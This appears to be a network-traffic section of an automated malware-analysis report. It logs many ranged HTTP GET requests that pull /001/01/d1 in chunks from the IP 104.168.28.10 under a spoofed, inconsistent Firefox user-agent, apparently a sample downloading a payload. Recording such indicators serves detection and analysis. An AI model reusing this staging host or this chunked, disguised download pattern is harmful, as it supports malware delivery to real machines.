Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3823616-3839999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3840000-3856383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3856384-3860479User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3860480-3868671User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3868672-3872767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3872768-3905535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3905536-3913727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3913728-3930111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3930112-3946495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3868672-3872767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3946496-3962879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3962880-3995647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3995648-4003839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4003840-4005887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4005888-4022271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4022272-4024319User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4024320-4089855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4089856-4093951User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4093952-4110335User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4110336-4114431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4114432-4122623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4122624-4130815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4130816-4163583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4163584-4171775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4171776-4188159User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4122624-4130815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4188160-4204543User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4204544-4212735User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4212736-4245503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4245504-4249599User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4249600-4257791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4257792-4261887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4261888-4270079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4270080-4286463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4286464-4351999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4352000-4353023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4353024-4361215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4361216-4369407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4369408-4371455User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4371456-4387839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4387840-4396031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4396032-4400127User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4371456-4387839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4400128-4416511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4416512-4424703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4424704-4441087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4441088-4445183User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4445184-4461567User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4461568-4469759User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4469760-4473855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4473856-4482047User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4482048-4490239User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4490240-4506623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4506624-4514815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4514816-4523007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4523008-4531199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4531200-4539391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4539392-4543487User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4543488-4559871User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4539392-4543487User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4559872-4576255User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4576256-4609023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4609024-4625407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4625408-4658175User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4658176-4690943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4690944-4695039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4695040-4697087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4697088-4705279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4705280-4709375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4709376-4713471User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4713472-4779007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4779008-4787199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4787200-4795391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4795392-4803583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4803584-4805631User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4805632-4809727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4803584-4805631User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4809728-4826111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4826112-4842495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4842496-4858879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4858880-4862975User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4862976-4867071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4867072-4899839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4899840-4908031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4908032-4916223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4867072-4899839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4916224-4924415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4924416-4932607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4932608-4936703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4936704-4944895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4944896-4961279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4932608-4936703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4936704-4944895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4961280-4965375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4965376-4998143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4998144-5030911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5030912-5039103User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5039104-5043199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5043200-5047295User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5047296-5051391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5051392-5067775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5067776-5075967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5075968-5084159User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5084160-5092351User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5092352-5094399User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5094400-5127167User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5127168-5143551User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5143552-5159935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5159936-5176319User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5176320-5192703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5143552-5159935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5192704-5196799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5196800-5200895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5200896-5266431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5266432-5274623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5274624-5307391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5307392-5315583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5315584-5348351User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5348352-5364735User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5364736-5381119User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5381120-5389311User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
